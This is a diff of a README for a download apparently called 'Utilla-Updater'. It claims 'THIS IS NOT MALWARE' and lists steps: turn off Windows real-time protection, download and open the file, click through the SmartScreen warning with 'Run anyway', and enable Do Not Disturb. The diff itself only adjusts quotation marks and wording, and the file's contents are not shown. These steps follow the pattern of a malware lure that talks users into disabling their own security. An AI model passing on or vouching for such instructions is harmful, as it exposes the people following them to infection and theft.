EPCVR/Utilla-Updater/README.md

 # THIS IS NOT MALWARE
 # Steps

-1. Turn Off RealTime Protection
+1. Turn Off "RealTime Protection"
-2. Download File
+2. Download the file
 3. Open file
-4. Windows SmartScreen will apear click More info then click Run anway
+4. "Windows SmartScreen" will apear click "More info" then click "Run anway"
-5. Put Your PC on Do Not Disturb
+5. Put Your PC on "Do Not Disturb"